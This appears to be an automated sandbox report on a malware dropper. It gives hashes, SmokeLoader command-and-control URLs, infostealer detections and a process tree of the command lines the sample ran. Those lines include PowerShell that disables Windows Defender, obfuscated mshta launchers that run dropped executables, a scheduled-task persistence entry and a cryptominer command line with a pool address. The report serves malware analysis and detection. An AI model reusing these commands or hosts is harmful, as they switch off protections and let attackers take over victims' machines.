Resubmissions
27-10-2021 12:55
211027-p592qaegd7 1027-10-2021 05:03
211027-fpnzwaaff8 1026-10-2021 14:24
211026-rqs6rshff8 10Analysis
-
max time kernel
33s -
max time network
1803s -
platform
windows7_x64 -
resource
win7-en-20211014 -
submitted
26-10-2021 14:24
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win7-ja-20210920
Behavioral task
behavioral2
Sample
setup_x86_x64_install.exe
Resource
win7-en-20211014
Behavioral task
behavioral3
Sample
setup_x86_x64_install.exe
Resource
win7-de-20210920
Behavioral task
behavioral4
Sample
setup_x86_x64_install.exe
Resource
win11
Behavioral task
behavioral5
Sample
setup_x86_x64_install.exe
Resource
win10-ja-20211014
Behavioral task
behavioral6
Sample
setup_x86_x64_install.exe
Resource
win10-en-20210920
Behavioral task
behavioral7
Sample
setup_x86_x64_install.exe
Resource
win10-de-20211014
General
-
Target
setup_x86_x64_install.exe
-
Size
5.6MB
-
MD5
8dfefd1f56f2ac4f1869d86edbb4aa8f
-
SHA1
3a65b0920890fd7e8ae751ee15f76de281584010
-
SHA256
433e51a49b84a52cd5f740a12ec46a145d3c14a95e529d4ef32fd250e02829ed
-
SHA512
996a84df42b79c8786f4347b875621a476bd6a0e71d4c61fd47a726fb9f6717051d03d8b381233e7966c1a2150628b8b7986727298a6fc803aea504f96fd934c
Malware Config
Extracted
smokeloader
2020
http://brandyjaggers.com/upload/
http://andbal.com/upload/
http://alotofquotes.com/upload/
http://szpnc.cn/upload/
http://uggeboots.com/upload/
http://100klv.com/upload/
http://rapmusic.at/upload/
Signatures
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 564 3064 rundll32.exe 88 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3192 1016 rundll32.exe 122 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 2 IoCs
resource yara_rule behavioral2/memory/968-280-0x0000000000418D2E-mapping.dmp family_redline behavioral2/memory/2460-291-0x0000000000418542-mapping.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 1 IoCs
resource yara_rule behavioral2/files/0x0006000000012284-180.dat family_socelars -
resource yara_rule behavioral2/files/0x0006000000012239-71.dat aspack_v212_v242 behavioral2/files/0x0006000000012239-72.dat aspack_v212_v242 behavioral2/files/0x0006000000012235-73.dat aspack_v212_v242 behavioral2/files/0x0006000000012235-74.dat aspack_v212_v242 behavioral2/files/0x0006000000012241-77.dat aspack_v212_v242 behavioral2/files/0x0006000000012241-78.dat aspack_v212_v242 -
Downloads MZ/PE file
-
Executes dropped EXE 19 IoCs
pid Process 1208 setup_installer.exe 768 setup_install.exe 1768 Tue0985edbf92e08954.exe 776 Tue0978af55b9.exe 1968 Tue097328c1b990.exe 1464 Tue091e2054cef7.exe 1576 Tue0947ef38552fc.exe 1960 Tue09a30919dc5f00.exe 1368 Tue09c1731fe55c7.exe 1316 Tue09792fda06e.exe 1108 Tue09c6db969ab9.exe 868 Tue09c257807a702a4.exe 1144 Tue09786995c7f02a923.exe 1604 Tue093cbcf0222440.exe 1392 8211480.exe 852 Tue0956c36b51.exe 1944 Tue0971aafeebb6f.exe 1460 Tue093cbcf0222440.exe 992 Tue0990c8b597f.tmp -
Loads dropped DLL 64 IoCs
pid Process 320 setup_x86_x64_install.exe 1208 setup_installer.exe 1208 setup_installer.exe 1208 setup_installer.exe 1208 setup_installer.exe 1208 setup_installer.exe 1208 setup_installer.exe 768 setup_install.exe 768 setup_install.exe 768 setup_install.exe 768 setup_install.exe 768 setup_install.exe 768 setup_install.exe 768 setup_install.exe 768 setup_install.exe 1180 cmd.exe 1724 cmd.exe 1060 cmd.exe 1940 cmd.exe 1896 cmd.exe 460 cmd.exe 1880 6386173.exe 1924 cmd.exe 1060 cmd.exe 732 cmd.exe 1388 Process not Found 820 cmd.exe 1880 6386173.exe 732 cmd.exe 1940 cmd.exe 1408 cmd.exe 676 cmd.exe 1224 MSBuild.exe 1224 MSBuild.exe 1144 Tue09786995c7f02a923.exe 1576 Tue0947ef38552fc.exe 1960 Tue09a30919dc5f00.exe 868 Tue09c257807a702a4.exe 1316 Tue09792fda06e.exe 1368 Tue09c1731fe55c7.exe 1108 Tue09c6db969ab9.exe 1576 Tue0947ef38552fc.exe 1144 Tue09786995c7f02a923.exe 1960 Tue09a30919dc5f00.exe 1616 cmd.exe 1316 Tue09792fda06e.exe 1108 Tue09c6db969ab9.exe 868 Tue09c257807a702a4.exe 1368 Tue09c1731fe55c7.exe 852 Tue0956c36b51.exe 852 Tue0956c36b51.exe 1604 Tue093cbcf0222440.exe 1604 Tue093cbcf0222440.exe 1392 8211480.exe 1392 8211480.exe 1604 Tue093cbcf0222440.exe 1392 8211480.exe 992 Tue0990c8b597f.tmp 992 Tue0990c8b597f.tmp 1944 Tue0971aafeebb6f.exe 1944 Tue0971aafeebb6f.exe 1460 Tue093cbcf0222440.exe 1460 Tue093cbcf0222440.exe 992 Tue0990c8b597f.tmp -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 7 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 6 ip-api.com 53 ipinfo.io 54 ipinfo.io 75 freegeoip.app 77 freegeoip.app 78 freegeoip.app 80 freegeoip.app -
autoit_exe 3 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x0006000000012272-134.dat autoit_exe behavioral2/files/0x0006000000012272-162.dat autoit_exe behavioral2/files/0x0006000000012272-181.dat autoit_exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 5 IoCs
pid pid_target Process procid_target 2456 868 WerFault.exe 53 2208 2988 WerFault.exe 86 3124 1992 WerFault.exe 131 3468 1760 WerFault.exe 140 3564 2332 WerFault.exe 129 -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4024 schtasks.exe -
Kills process with taskkill 4 IoCs
pid Process 2740 taskkill.exe 2860 taskkill.exe 2272 taskkill.exe 3728 taskkill.exe -
Suspicious use of AdjustPrivilegeToken 34 IoCs
description pid Process Token: SeCreateTokenPrivilege 1944 Tue0971aafeebb6f.exe Token: SeAssignPrimaryTokenPrivilege 1944 Tue0971aafeebb6f.exe Token: SeLockMemoryPrivilege 1944 Tue0971aafeebb6f.exe Token: SeIncreaseQuotaPrivilege 1944 Tue0971aafeebb6f.exe Token: SeMachineAccountPrivilege 1944 Tue0971aafeebb6f.exe Token: SeTcbPrivilege 1944 Tue0971aafeebb6f.exe Token: SeSecurityPrivilege 1944 Tue0971aafeebb6f.exe Token: SeTakeOwnershipPrivilege 1944 Tue0971aafeebb6f.exe Token: SeLoadDriverPrivilege 1944 Tue0971aafeebb6f.exe Token: SeSystemProfilePrivilege 1944 Tue0971aafeebb6f.exe Token: SeSystemtimePrivilege 1944 Tue0971aafeebb6f.exe Token: SeProfSingleProcessPrivilege 1944 Tue0971aafeebb6f.exe Token: SeIncBasePriorityPrivilege 1944 Tue0971aafeebb6f.exe Token: SeCreatePagefilePrivilege 1944 Tue0971aafeebb6f.exe Token: SeCreatePermanentPrivilege 1944 Tue0971aafeebb6f.exe Token: SeBackupPrivilege 1944 Tue0971aafeebb6f.exe Token: SeRestorePrivilege 1944 Tue0971aafeebb6f.exe Token: SeShutdownPrivilege 1944 Tue0971aafeebb6f.exe Token: SeDebugPrivilege 1944 Tue0971aafeebb6f.exe Token: SeAuditPrivilege 1944 Tue0971aafeebb6f.exe Token: SeSystemEnvironmentPrivilege 1944 Tue0971aafeebb6f.exe Token: SeChangeNotifyPrivilege 1944 Tue0971aafeebb6f.exe Token: SeRemoteShutdownPrivilege 1944 Tue0971aafeebb6f.exe Token: SeUndockPrivilege 1944 Tue0971aafeebb6f.exe Token: SeSyncAgentPrivilege 1944 Tue0971aafeebb6f.exe Token: SeEnableDelegationPrivilege 1944 Tue0971aafeebb6f.exe Token: SeManageVolumePrivilege 1944 Tue0971aafeebb6f.exe Token: SeImpersonatePrivilege 1944 Tue0971aafeebb6f.exe Token: SeCreateGlobalPrivilege 1944 Tue0971aafeebb6f.exe Token: 31 1944 Tue0971aafeebb6f.exe Token: 32 1944 Tue0971aafeebb6f.exe Token: 33 1944 Tue0971aafeebb6f.exe Token: 34 1944 Tue0971aafeebb6f.exe Token: 35 1944 Tue0971aafeebb6f.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 1576 Tue0947ef38552fc.exe 1576 Tue0947ef38552fc.exe -
Suspicious use of SendNotifyMessage 2 IoCs
pid Process 1576 Tue0947ef38552fc.exe 1576 Tue0947ef38552fc.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 320 wrote to memory of 1208 320 setup_x86_x64_install.exe 28 PID 320 wrote to memory of 1208 320 setup_x86_x64_install.exe 28 PID 320 wrote to memory of 1208 320 setup_x86_x64_install.exe 28 PID 320 wrote to memory of 1208 320 setup_x86_x64_install.exe 28 PID 320 wrote to memory of 1208 320 setup_x86_x64_install.exe 28 PID 320 wrote to memory of 1208 320 setup_x86_x64_install.exe 28 PID 320 wrote to memory of 1208 320 setup_x86_x64_install.exe 28 PID 1208 wrote to memory of 768 1208 setup_installer.exe 29 PID 1208 wrote to memory of 768 1208 setup_installer.exe 29 PID 1208 wrote to memory of 768 1208 setup_installer.exe 29 PID 1208 wrote to memory of 768 1208 setup_installer.exe 29 PID 1208 wrote to memory of 768 1208 setup_installer.exe 29 PID 1208 wrote to memory of 768 1208 setup_installer.exe 29 PID 1208 wrote to memory of 768 1208 setup_installer.exe 29 PID 768 wrote to memory of 1684 768 setup_install.exe 31 PID 768 wrote to memory of 1684 768 setup_install.exe 31 PID 768 wrote to memory of 1684 768 setup_install.exe 31 PID 768 wrote to memory of 1684 768 setup_install.exe 31 PID 768 wrote to memory of 1684 768 setup_install.exe 31 PID 768 wrote to memory of 1684 768 setup_install.exe 31 PID 768 wrote to memory of 1684 768 setup_install.exe 31 PID 768 wrote to memory of 1532 768 setup_install.exe 32 PID 768 wrote to memory of 1532 768 setup_install.exe 32 PID 768 wrote to memory of 1532 768 setup_install.exe 32 PID 768 wrote to memory of 1532 768 setup_install.exe 32 PID 768 wrote to memory of 1532 768 setup_install.exe 32 PID 768 wrote to memory of 1532 768 setup_install.exe 32 PID 768 wrote to memory of 1532 768 setup_install.exe 32 PID 768 wrote to memory of 1180 768 setup_install.exe 33 PID 768 wrote to memory of 1180 768 setup_install.exe 33 PID 768 wrote to memory of 1180 768 setup_install.exe 33 PID 768 wrote to memory of 1180 768 setup_install.exe 33 PID 768 wrote to memory of 1180 768 setup_install.exe 33 PID 768 wrote to memory of 1180 768 setup_install.exe 33 PID 768 wrote to memory of 1180 768 setup_install.exe 33 PID 768 wrote to memory of 1924 768 setup_install.exe 34 PID 768 wrote to memory of 1924 768 setup_install.exe 34 PID 768 wrote to memory of 1924 768 setup_install.exe 34 PID 768 wrote to memory of 1924 768 setup_install.exe 34 PID 768 wrote to memory of 1924 768 setup_install.exe 34 PID 768 wrote to memory of 1924 768 setup_install.exe 34 PID 768 wrote to memory of 1924 768 setup_install.exe 34 PID 768 wrote to memory of 1896 768 setup_install.exe 37 PID 768 wrote to memory of 1896 768 setup_install.exe 37 PID 768 wrote to memory of 1896 768 setup_install.exe 37 PID 768 wrote to memory of 1896 768 setup_install.exe 37 PID 768 wrote to memory of 1896 768 setup_install.exe 37 PID 768 wrote to memory of 1896 768 setup_install.exe 37 PID 768 wrote to memory of 1896 768 setup_install.exe 37 PID 768 wrote to memory of 1724 768 setup_install.exe 35 PID 768 wrote to memory of 1724 768 setup_install.exe 35 PID 768 wrote to memory of 1724 768 setup_install.exe 35 PID 768 wrote to memory of 1724 768 setup_install.exe 35 PID 768 wrote to memory of 1724 768 setup_install.exe 35 PID 768 wrote to memory of 1724 768 setup_install.exe 35 PID 768 wrote to memory of 1724 768 setup_install.exe 35 PID 1180 wrote to memory of 1768 1180 cmd.exe 36 PID 1180 wrote to memory of 1768 1180 cmd.exe 36 PID 1180 wrote to memory of 1768 1180 cmd.exe 36 PID 1180 wrote to memory of 1768 1180 cmd.exe 36 PID 768 wrote to memory of 1940 768 setup_install.exe 38 PID 768 wrote to memory of 1940 768 setup_install.exe 38 PID 768 wrote to memory of 1940 768 setup_install.exe 38 PID 768 wrote to memory of 1940 768 setup_install.exe 38
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:320 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1208 -
C:\Users\Admin\AppData\Local\Temp\7zS8B4E8FF5\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS8B4E8FF5\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:768 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable4⤵PID:1684
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable5⤵PID:572
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵PID:1532
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵PID:320
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue0985edbf92e08954.exe4⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1180 -
C:\Users\Admin\AppData\Local\Temp\7zS8B4E8FF5\Tue0985edbf92e08954.exeTue0985edbf92e08954.exe5⤵
- Executes dropped EXE
PID:1768 -
C:\ProgramData\7154636.exe"C:\ProgramData\7154636.exe"6⤵PID:2204
-
-
C:\ProgramData\1233516.exe"C:\ProgramData\1233516.exe"6⤵PID:2540
-
-
C:\ProgramData\8211480.exe"C:\ProgramData\8211480.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1392 -
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"7⤵PID:1608
-
-
-
C:\ProgramData\6386173.exe"C:\ProgramData\6386173.exe"6⤵
- Loads dropped DLL
PID:1880
-
-
C:\ProgramData\2240357.exe"C:\ProgramData\2240357.exe"6⤵PID:596
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\SysWOW64\explorer.exe"7⤵PID:2900
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue09c257807a702a4.exe4⤵
- Loads dropped DLL
PID:1924 -
C:\Users\Admin\AppData\Local\Temp\7zS8B4E8FF5\Tue09c257807a702a4.exeTue09c257807a702a4.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:868 -
C:\Users\Admin\Pictures\Adobe Films\4gmRssew6khFyldneUxfCMtG.exe"C:\Users\Admin\Pictures\Adobe Films\4gmRssew6khFyldneUxfCMtG.exe"6⤵PID:2908
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 868 -s 15126⤵
- Program crash
PID:2456
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue0978af55b9.exe4⤵
- Loads dropped DLL
PID:1724 -
C:\Users\Admin\AppData\Local\Temp\7zS8B4E8FF5\Tue0978af55b9.exeTue0978af55b9.exe5⤵
- Executes dropped EXE
PID:776 -
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"6⤵PID:2824
-
C:\Users\Admin\AppData\Local\Temp\BCleanSoft82.exe"C:\Users\Admin\AppData\Local\Temp\BCleanSoft82.exe"7⤵PID:2404
-
C:\Users\Admin\AppData\Roaming\474990.exe"C:\Users\Admin\AppData\Roaming\474990.exe"8⤵PID:2200
-
-
C:\Users\Admin\AppData\Roaming\4912380.exe"C:\Users\Admin\AppData\Roaming\4912380.exe"8⤵PID:2920
-
-
C:\Users\Admin\AppData\Roaming\6853852.exe"C:\Users\Admin\AppData\Roaming\6853852.exe"8⤵PID:2124
-
-
C:\Users\Admin\AppData\Roaming\1520579.exe"C:\Users\Admin\AppData\Roaming\1520579.exe"8⤵PID:2868
-
-
C:\Users\Admin\AppData\Roaming\6652682.exe"C:\Users\Admin\AppData\Roaming\6652682.exe"8⤵PID:3316
-
-
C:\Users\Admin\AppData\Roaming\561807.exe"C:\Users\Admin\AppData\Roaming\561807.exe"8⤵PID:3328
-
-
C:\Users\Admin\AppData\Roaming\1032332.exe"C:\Users\Admin\AppData\Roaming\1032332.exe"8⤵PID:3344
-
-
-
C:\Users\Admin\AppData\Local\Temp\inst1.exe"C:\Users\Admin\AppData\Local\Temp\inst1.exe"7⤵PID:2776
-
-
C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe"C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe"7⤵PID:2332
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2332 -s 9608⤵
- Program crash
PID:3564
-
-
-
C:\Users\Admin\AppData\Local\Temp\4.exe"C:\Users\Admin\AppData\Local\Temp\4.exe"7⤵PID:1628
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"8⤵PID:3016
-
-
-
C:\Users\Admin\AppData\Local\Temp\5.exe"C:\Users\Admin\AppData\Local\Temp\5.exe"7⤵PID:1992
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1992 -s 14008⤵
- Program crash
PID:3124
-
-
-
C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"7⤵PID:2924
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )8⤵PID:2676
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ) do taskkill -f -iM "%~NxM"9⤵PID:1620
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "search_hyperfs_206.exe"10⤵
- Kills process with taskkill
PID:2272
-
-
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi10⤵PID:1552
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )11⤵PID:3404
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If "/PLQtzfgO0m8dRv4iYALOqi "=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"12⤵PID:3300
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt:CLosE ( cReAteobjEcT("wscRiPt.SheLl" ). RUn ("C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE) )11⤵PID:3864
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V +1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC& Del /q *&starT msiexec -Y ..\lXQ2g.WC12⤵PID:3848
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"13⤵PID:2628
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHo "13⤵PID:2096
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec -Y ..\lXQ2g.WC13⤵PID:3120
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"7⤵PID:884
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\setup.exe" & exit8⤵PID:3960
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "setup.exe" /f9⤵
- Kills process with taskkill
PID:3728
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\juanli-game.exe"C:\Users\Admin\AppData\Local\Temp\juanli-game.exe"7⤵PID:1640
-
-
C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"7⤵PID:3060
-
-
C:\Users\Admin\AppData\Local\Temp\10.exe"C:\Users\Admin\AppData\Local\Temp\10.exe"7⤵PID:1760
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1760 -s 13848⤵
- Program crash
PID:3468
-
-
-
C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"7⤵PID:2292
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"8⤵PID:960
-
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"9⤵PID:3992
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"10⤵
- Creates scheduled task(s)
PID:4024
-
-
-
C:\Windows\System32\cmd.exe"cmd" cmd /c "C:\Users\Admin\AppData\Roaming\services64.exe"9⤵PID:4092
-
C:\Users\Admin\AppData\Roaming\services64.exeC:\Users\Admin\AppData\Roaming\services64.exe10⤵PID:3144
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\services64.exe"11⤵PID:3340
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"12⤵PID:3824
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "/sihost64"13⤵PID:2200
-
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.udda/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6OAdluV/h8Wx+uVST9CwRTBBZDSizq+6yEkb73lzV2SG" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=60 --tls --cinit-stealth12⤵PID:904
-
-
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue097328c1b990.exe4⤵
- Loads dropped DLL
PID:1896 -
C:\Users\Admin\AppData\Local\Temp\7zS8B4E8FF5\Tue097328c1b990.exeTue097328c1b990.exe5⤵
- Executes dropped EXE
PID:1968
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue09c6db969ab9.exe4⤵
- Loads dropped DLL
PID:1940 -
C:\Users\Admin\AppData\Local\Temp\7zS8B4E8FF5\Tue09c6db969ab9.exeTue09c6db969ab9.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1108 -
C:\Users\Admin\AppData\Local\Temp\7zS8B4E8FF5\Tue09c6db969ab9.exeC:\Users\Admin\AppData\Local\Temp\7zS8B4E8FF5\Tue09c6db969ab9.exe6⤵PID:968
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue09a30919dc5f00.exe4⤵PID:460
-
C:\Users\Admin\AppData\Local\Temp\7zS8B4E8FF5\Tue09a30919dc5f00.exeTue09a30919dc5f00.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1960 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscrIPT: CLosE( creatEobjeCt("WSCRIpt.Shell" ).RUN( "C:\Windows\system32\cmd.exe /R TYPe ""C:\Users\Admin\AppData\Local\Temp\7zS8B4E8FF5\Tue09a30919dc5f00.exe"" > ..\WG1uEEN.EXe && StarT ..\WG1uEEn.Exe -PhwqM9LteEkjDz5gZPyhw9N49u86 & If """" == """" for %b In (""C:\Users\Admin\AppData\Local\Temp\7zS8B4E8FF5\Tue09a30919dc5f00.exe"" ) do taskkill /f /iM ""%~Nxb"" " , 0 , TRUe ) )6⤵PID:2328
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R TYPe "C:\Users\Admin\AppData\Local\Temp\7zS8B4E8FF5\Tue09a30919dc5f00.exe" > ..\WG1uEEN.EXe && StarT ..\WG1uEEn.Exe -PhwqM9LteEkjDz5gZPyhw9N49u86 &If "" == "" for %b In ("C:\Users\Admin\AppData\Local\Temp\7zS8B4E8FF5\Tue09a30919dc5f00.exe" ) do taskkill /f /iM "%~Nxb"7⤵PID:2624
-
C:\Users\Admin\AppData\Local\Temp\WG1uEEN.EXe..\WG1uEEn.Exe -PhwqM9LteEkjDz5gZPyhw9N49u868⤵PID:2724
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscrIPT: CLosE( creatEobjeCt("WSCRIpt.Shell" ).RUN( "C:\Windows\system32\cmd.exe /R TYPe ""C:\Users\Admin\AppData\Local\Temp\WG1uEEN.EXe"" > ..\WG1uEEN.EXe && StarT ..\WG1uEEn.Exe -PhwqM9LteEkjDz5gZPyhw9N49u86 & If ""-PhwqM9LteEkjDz5gZPyhw9N49u86 "" == """" for %b In (""C:\Users\Admin\AppData\Local\Temp\WG1uEEN.EXe"" ) do taskkill /f /iM ""%~Nxb"" " , 0 , TRUe ) )9⤵PID:2956
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /iM "Tue09a30919dc5f00.exe"8⤵
- Kills process with taskkill
PID:2740
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue09c1731fe55c7.exe4⤵
- Loads dropped DLL
PID:1060 -
